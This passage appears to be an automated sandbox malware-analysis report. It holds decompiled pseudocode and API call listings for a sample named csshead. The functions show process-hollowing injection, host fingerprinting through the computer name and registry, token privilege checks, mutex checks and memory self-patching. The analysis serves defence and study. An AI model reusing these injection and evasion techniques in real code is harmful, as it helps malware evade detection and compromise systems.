    				if(_t16 != 0) {
    					 *_t47(0);
    				}
    				if(E0040453C(GetCurrentProcess()) == 0) {
    					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
    					E0040133C(_t51 - 0x218, 0x40946c);
    				} else {
    					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
    					_t42 =  *0x40a0b0; // 0x401c64
    					E0040133C(_t51 - 0x218, _t42);
    				}
    				_t24 =  *0x40a08c; // 0x401c00
    				E0040133C(_t51 - 0x218, _t24);
    				_t29 = E00405028(_t51 - 0x218, 0, E00409080, _t51 - 0x117, 0xffffffff, 0xfa0); // executed
    				 *((intOrPtr*)(_t51 - 0xc)) = _t29;
    				if( *((intOrPtr*)(_t51 - 0xc)) == 0xffffffff) {
    					 *0x40b21c(0, _t51 - 0x218, 0x26, 0xffffffff);
    					_t32 =  *0x40a0dc; // 0x401ce8
    					E0040133C(_t51 - 0x218, _t32);
    					if(PathFileExistsA(_t51 - 0x218) != 0) {
    						 *((intOrPtr*)(_t51 - 0xc)) = E00405028(_t51 - 0x218, 0, E00409080, _t51 - 0x117, 0xffffffff, 0xfa0);
    					}
    				}
    				ExitProcess(0);
    			}

    APIs
    • GetCurrentProcess.KERNEL32 ref: 00409359
      • Part of subcall function 0040453C: GetCurrentProcess.KERNEL32 ref: 00404555
      • Part of subcall function 0040453C: IsWow64Process.KERNEL32(00000000,?), ref: 0040456F
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 00409374
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 0040939D
      • Part of subcall function 00405028: GetModuleHandleA.KERNEL32(00000000), ref: 00405040
      • Part of subcall function 00405028: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
      • Part of subcall function 00405028: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
      • Part of subcall function 00405028: MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D
      • Part of subcall function 00405028: GetThreadContext.KERNEL32(?,00010007), ref: 00405209
      • Part of subcall function 00405028: VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
      • Part of subcall function 00405028: WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C
      • Part of subcall function 00405028: ResumeThread.KERNELBASE(?), ref: 0040527E
      • Part of subcall function 00405028: WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
      • Part of subcall function 00405028: GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
      • Part of subcall function 00405028: CloseHandle.KERNEL32(?), ref: 004052BE
      • Part of subcall function 00405028: CloseHandle.KERNEL32(?), ref: 004052C8
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00409406
    • PathFileExistsA.SHLWAPI(?), ref: 00409428
    • ExitProcess.KERNEL32 ref: 0040945B
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 93%
    			E00404A68(intOrPtr __eax) {
    				intOrPtr _v8;
    				signed int _v12;
    				long _v16;
    				signed int _v20;
    				void* _v24;
    				char _v153;
    				int _t30;
    				char* _t32;
    				intOrPtr _t37;
    				void* _t48;
    				intOrPtr _t49;
    				void* _t51;
    				signed int _t52;
    				signed char _t62;
    				intOrPtr _t67;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_v16 = 0x81;
    				_t30 = GetComputerNameA( &_v153,  &_v16);
    				_t72 = _t30;
    				if(_t30 != 0) {
    					_v12 = E00401740( &_v153);
    				}
    				_t32 =  *0x40a25c; // 0x402174
    				RegOpenKeyExA(0x80000002, _t32, 0, 0x20119,  &_v24); // executed
    				_v16 = 4;
    				_v20 = 0;
    				_t37 =  *0x40a0f0; // 0x401d3c
    				E004038B0(_v24, _t37, 0, 0,  &_v20,  &_v16); // executed
    				E00403890(_v24);
    				_v12 = _v12 ^ _v20 ^ 0x4c8aa297;
    				E00401164(_v12,  &_v153);
    				 *0x40a064 = E004044F0(_t72);
    				_t48 = GetCurrentProcess(); // executed
    				_t49 = E004042D4(_t48); // executed
    				 *0x40a068 = _t49;
    				if(E004044F0(_t72) >= 0x3c) {
    					_t51 = GetCurrentProcess(); // executed
    					_t52 = E004042D4(_t51); // executed
    					__eflags = _t52 - 3;
    					_t21 = _t52 == 3;
    					__eflags = _t21;
    					asm("sbb eax, eax");
    					 *0x40a034 =  ~(_t52 & 0xffffff00 | _t21);
    				} else {
    					_t62 = E004041CC();
    					asm("sbb eax, eax");
    					 *0x40a034 =  ~_t62;
    				}
    				if( *0x40a034 != 0) {
    					_t67 =  *0x40a09c; // 0x401c30
    					E00401308(_v8, _t67);
    				}
    				E0040133C(_v8, 0x404b9c);
    				return E0040133C(_v8,  &_v153);
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,00000081), ref: 00404A8B
    • RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00404AB9
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
      • Part of subcall function 004044F0: GetVersionExA.KERNEL32(0000009C), ref: 0040451A
    • GetCurrentProcess.KERNEL32 ref: 00404B17
      • Part of subcall function 004042D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
      • Part of subcall function 004042D4: GetLastError.KERNEL32 ref: 00404322
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
      • Part of subcall function 004042D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
      • Part of subcall function 004042D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
      • Part of subcall function 004042D4: CloseHandle.KERNEL32(?), ref: 004043F3
    • GetCurrentProcess.KERNEL32 ref: 00404B41
      • Part of subcall function 004041CC: GetCurrentThread.KERNEL32 ref: 004041DE
      • Part of subcall function 004041CC: OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
      • Part of subcall function 004041CC: GetLastError.KERNEL32 ref: 004041F4
      • Part of subcall function 004041CC: GetCurrentProcess.KERNEL32 ref: 00404207
      • Part of subcall function 004041CC: OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004041CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
      • Part of subcall function 004041CC: CloseHandle.KERNEL32(?), ref: 0040424E
      • Part of subcall function 004041CC: AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
      • Part of subcall function 004041CC: EqualSid.ADVAPI32(?,?), ref: 004042A2
      • Part of subcall function 004041CC: FreeSid.ADVAPI32(?), ref: 004042BE
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 79%
    			E00409230(intOrPtr* __ebx, intOrPtr* __ecx) {
    				void* _t8;
    				void* _t11;
    				int _t12;
    				void* _t13;
    				CHAR* _t14;
    				void* _t22;
    				intOrPtr _t24;
    				void* _t25;
    
    				_t8 =  *__ecx(); // executed
    				if(_t8 != 0) {
    					_push(0);
    					 *__ebx();
    				}
    				_pop(_t22);
    				_pop(_t19);
    				_t24 =  *0x40a0a8; // 0x401c4c
    				_t11 = E00401110( *((intOrPtr*)(_t25 - 4)), _t24);
    				_t29 = _t11;
    				if(_t11 == 0) {
    					 *((char*)(_t25 - 0x116)) = 0x2d;
    				} else {
    					 *((char*)(_t25 - 0x116)) = 0x2b;
    					Sleep(0x3a98);
    				}
    				_t12 = E00406E04(_t22, _t29);
    				if(_t12 == 0) {
    					if( *((char*)(_t25 - 0x116)) != 0x2d) {
    						L9:
    						_push(_t12);
    						_push(_t22); // executed
    						_t13 = E004069BC(_t24, _t32); // executed
    						_t12 = _t13 + E004092CD;
    						goto __eax; // executed
    					}
    					_t14 =  *0x40a0d8; // 0x401cc8
    					_t12 = OpenMutexA(0x100000, 0, _t14);
    					 *(_t25 - 8) = _t12;
    					_t32 =  *(_t25 - 8);
    					if( *(_t25 - 8) == 0) {
    						goto L9;
    					}
    					_t12 = CloseHandle( *(_t25 - 8));
    					ExitProcess(0);
    				}
    				return _t12;
    			}

    APIs
    • Sleep.KERNEL32(00003A98), ref: 00409260
      • Part of subcall function 00406E04: GetModuleFileNameA.KERNEL32(00000000,?,000001F5), ref: 00406E26
      • Part of subcall function 00406E04: CharUpperBuffA.USER32(?,000001F5), ref: 00406E37
    • OpenMutexA.KERNEL32(00100000,00000000,00401CC8), ref: 00409292
    • CloseHandle.KERNEL32(00000000), ref: 004092A5
    • ExitProcess.KERNEL32 ref: 004092AD
      • Part of subcall function 004069BC: GetTempPathA.KERNEL32(00000101,?), ref: 004069E1
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • LoadLibraryA.KERNEL32(?), ref: 0045515A
    • GetProcAddress.KERNEL32(?,00452FF9), ref: 00455178
    • ExitProcess.KERNEL32(?,00452FF9), ref: 00455189
    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,?), ref: 004551A6
    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 004551BB
    Memory Dump Source
    • Source File: 00000000.00000001.27391107672.0042E000.00000080.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.27391103501.00400000.00000002.sdmp
    • Associated: 00000000.00000001.27391130383.00456000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0042CE2E
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0042CE51
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 37%
    			E004092CD() {
    				void* _t3;
    				intOrPtr _t10;
    				intOrPtr _t11;
    				intOrPtr* _t18;
    				intOrPtr* _t21;
    				void* _t24;
    				void* _t25;
    
    				_t3 =  *_t21();
    				_t28 = _t3;
    				if(_t3 != 0) {
    					 *_t18(0);
    				}
    				_pop(_t22);
    				_pop(_t19);
    				GetModuleFileNameA(0, _t25 - 0x117 + 2, 0x103);
    				_t10 = E00407C50(_t25 - 0x117 + 2); // executed
    				 *0x40a06c = _t10;
    				_t11 =  *0x40a06c; // 0x5b392e46
    				wsprintfA("1530474054", E00409468, _t11);
    				_push(GetCursorPos(0x40a578));
    				E004069BC(_t24, _t28); // executed
    				goto __eax;
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 004092F0
      • Part of subcall function 00407C50: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
      • Part of subcall function 00407C50: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
      • Part of subcall function 00407C50: ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
      • Part of subcall function 00407C50: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
      • Part of subcall function 00407C50: ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
      • Part of subcall function 00407C50: CloseHandle.KERNEL32(000000FF), ref: 00407CE7
    • wsprintfA.USER32 ref: 00409319
    • GetCursorPos.USER32(0040A578), ref: 00409327
      • Part of subcall function 004069BC: GetTempPathA.KERNEL32(00000101,?), ref: 004069E1
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 83%
    			E00404EF0(void* __eax, void* __eflags) {
    				void* _v8;
    				void _v12;
    				void* _v16;
    				void _v20;
    				void _v24;
    				void* _v28;
    				void* _v32;
    				long _v36;
    				intOrPtr* _v40;
    				void* _v52;
    				void _v64;
    				void* _t54;
    				signed int _t63;
    				signed int _t72;
    				signed int _t88;
    				signed int _t96;
    
    				_v8 = __eax;
    				_v24 = 0;
    				_v12 = 0;
    				_v28 = E004013DC(0x1000);
    				_t54 = E00404E94(_v8); // executed
    				_v32 = _t54;
    				if(_v32 != 0) {
    					_t63 = ReadProcessMemory(_v8, _v32, _v28, 0x1000,  &_v36); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t63) != 0) {
    						_t72 = ReadProcessMemory(_v8,  *((intOrPtr*)(_v28 + 0x3c)) + _v32, _v28, 0x1000,  &_v36); // executed
    						asm("sbb eax, eax");
    						if( ~( ~_t72) != 0) {
    							_v24 =  *((intOrPtr*)(_v28 + 0x28)) + _v32;
    							_v40 = _v28 + 0xc0;
    							if( *_v40 != 0 &&  *((intOrPtr*)(_v40 + 4)) != 0) {
    								_t88 = ReadProcessMemory(_v8,  *_v40 + _v32,  &_v64, 0x18,  &_v36);
    								asm("sbb eax, eax");
    								if( ~( ~_t88) != 0) {
    									_v16 = _v52;
    									if(_v16 != 0) {
    										_t96 = ReadProcessMemory(_v8, _v16, _v28, 0x1000,  &_v36);
    										asm("sbb eax, eax");
    										if( ~( ~_t96) != 0) {
    											_v20 =  *_v28;
    											if(_v20 != 0) {
    												_v24 = _v20;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				E00401440(_v28);
    				_v12 = _v24;
    				return _v12;
    			}

    APIs
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
      • Part of subcall function 00404E94: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00404EAD
      • Part of subcall function 00404E94: ReadProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 00404EDD
    • ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
    • ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 92%
    			E00406900(intOrPtr __eax, void* __edx) {
    				intOrPtr _v8;
    				long _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				intOrPtr _v117;
    				char _v153;
    				char* _t30;
    				intOrPtr _t35;
    
    				asm("das");
    				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
    				_v117 = _v117 + __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x81;
    				if(GetComputerNameA( &_v153,  &_v12) != 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v153),  &_v153);
    				}
    				_t30 =  *0x40a25c; // 0x402174
    				RegOpenKeyExA(0x80000002, _t30, 0, 0x20119,  &_v24); // executed
    				_v12 = 4;
    				_v20 = 0;
    				_t35 =  *0x40a0f0; // 0x401d3c
    				E004038B0(_v24, _t35, 0, 0,  &_v20,  &_v12); // executed
    				E00403890(_v24);
    				_v16 = _v16 ^ _v20 ^ 0xac67baee;
    				return E00401164(_v16, _v8);
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 00406927
    • RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00406904(intOrPtr __eax) {
    				intOrPtr _v8;
    				long _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				char _v153;
    				char* _t28;
    				intOrPtr _t33;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x81;
    				if(GetComputerNameA( &_v153,  &_v12) != 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v153),  &_v153);
    				}
    				_t28 =  *0x40a25c; // 0x402174
    				RegOpenKeyExA(0x80000002, _t28, 0, 0x20119,  &_v24); // executed
    				_v12 = 4;
    				_v20 = 0;
    				_t33 =  *0x40a0f0; // 0x401d3c
    				E004038B0(_v24, _t33, 0, 0,  &_v20,  &_v12); // executed
    				E00403890(_v24);
    				_v16 = _v16 ^ _v20 ^ 0xac67baee;
    				return E00401164(_v16, _v8);
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 00406927
    • RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
      • Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0
    • std::exception::exception.LIBCMT ref: 00423960
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004090B8(void* __edx) {
    				long _v8;
    				intOrPtr _t4;
    				void* _t6;
    				void* _t8;
    				intOrPtr _t11;
    				void* _t15;
    				intOrPtr _t17;
    				intOrPtr _t20;
    
    				E0040252C();
    				_t4 =  *0x40a274; // 0x4021ec
    				_t6 =  *0x40a078; // 0x401bd8
    				VirtualProtect(_t6, _t4 -  *0x40a078, 0x40,  &_v8);
    				_t17 =  *0x40a164; // 0x401de4
    				_t8 =  *0x40a078; // 0x401bd8
    				E00407C08(_t8 + 5, _t17 -  *0x40a078 - 5);
    				_t20 =  *0x40a274; // 0x4021ec
    				_t11 =  *0x40a164; // 0x401de4
    				E0040898C(_t11 + 5, _t20 -  *0x40a164 - 5);
    				_t15 = E00402574(0); // executed
    				return _t15;
    			}

    APIs
    • VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • VirtualProtect.KERNELBASE(?,00001000,00000004,?,?), ref: 004551A6
    • VirtualProtect.KERNELBASE(?,00001000), ref: 004551BB
    Memory Dump Source
    • Source File: 00000000.00000002.27490513501.00455000.00000080.sdmp, Offset: 00455000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_455000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
    • GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 82%
    			E00409468(signed int __eax, void* __edx) {
    				long _v8;
    				intOrPtr _v117;
    				long _t9;
    
    				 *(__eax & 0x5c000075) =  *(__eax & 0x5c000075) + (__eax & 0x5c000075);
    				_v117 = _v117 + __edx;
    				E004090B8(__edx); // executed
    				CreateThread(0, 0, E00409124, 0, 0,  &_v8); // executed
    				_push(0); // executed
    				_t9 = RtlExitUserThread(); // executed
    				return _t9;
    			}
    APIs
      • Part of subcall function 004090B8: VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9
    • CreateThread.KERNEL32(00000000,00000000,00409124,00000000,00000000,00409545), ref: 0040948A
    • RtlExitUserThread.NTDLL(00000000,?,?,00409545), ref: 00409492
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 75%
    			E00409470() {
    				long _v8;
    				long _t5;
    				void* _t6;
    
    				E004090B8(_t6); // executed
    				CreateThread(0, 0, E00409124, 0, 0,  &_v8); // executed
    				_push(0); // executed
    				_t5 = RtlExitUserThread(); // executed
    				return _t5;
    			}
    APIs
      • Part of subcall function 004090B8: VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9
    • CreateThread.KERNEL32(00000000,00000000,00409124,00000000,00000000,00409545), ref: 0040948A
    • RtlExitUserThread.NTDLL(00000000,?,?,00409545), ref: 00409492
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 81%
    			E004070E5(void* __ecx) {
    				signed char _v8;
    				void* _v12;
    				char _v16;
    				char* _v20;
    				void* _v24;
    				void* _v28;
    				char _v285;
    				intOrPtr _t31;
    				intOrPtr _t38;
    				void* _t44;
    				intOrPtr _t50;
    				signed int _t53;
    
    				 *0x237c1fdf = 0xeb;
    				asm("das");
    				 *(__ecx - 0x24) =  *(__ecx - 0x24) >> 0x41;
    				 *0x000000EB =  *((intOrPtr*)(0xeb)) + 0xeb;
    				 *((intOrPtr*)(0xeb)) =  *((intOrPtr*)(0xeb)) + 0xeb;
    				asm("scasd");
    				asm("adc eax, 0xdf023c78");
    				 *0x4e =  *0x4e + 0x4e;
    				_v8 = 0;
    				_t31 =  *0x40a564; // 0x4070d0
    				_v20 = E00403F38(_t31);
    				RegOpenKeyExA(0x80000002, _v20, 0, 0x20019,  &_v12); // executed
    				E00401440(_v20);
    				_v16 = 0x101;
    				_t38 =  *0x40a568; // 0x4070f0
    				_v24 = E00403F38(_t38);
    				_t44 = E004038B0(_v12, _v24, 0, 0,  &_v285,  &_v16); // executed
    				if(_t44 == 0) {
    					_t50 =  *0x40a56c; // 0x407108
    					_v28 = E00403F38(_t50);
    					_t53 = E00401110( &_v285, _v28);
    					asm("sbb eax, eax");
    					_v8 =  ~(_t53 & 0xffffff00 | _t53 != 0x00000000);
    					E00401440(_v28);
    				}
    				E00401440(_v24);
    				E00403890(_v12);
    				return _v8;
    			}
    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?), ref: 00407147
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
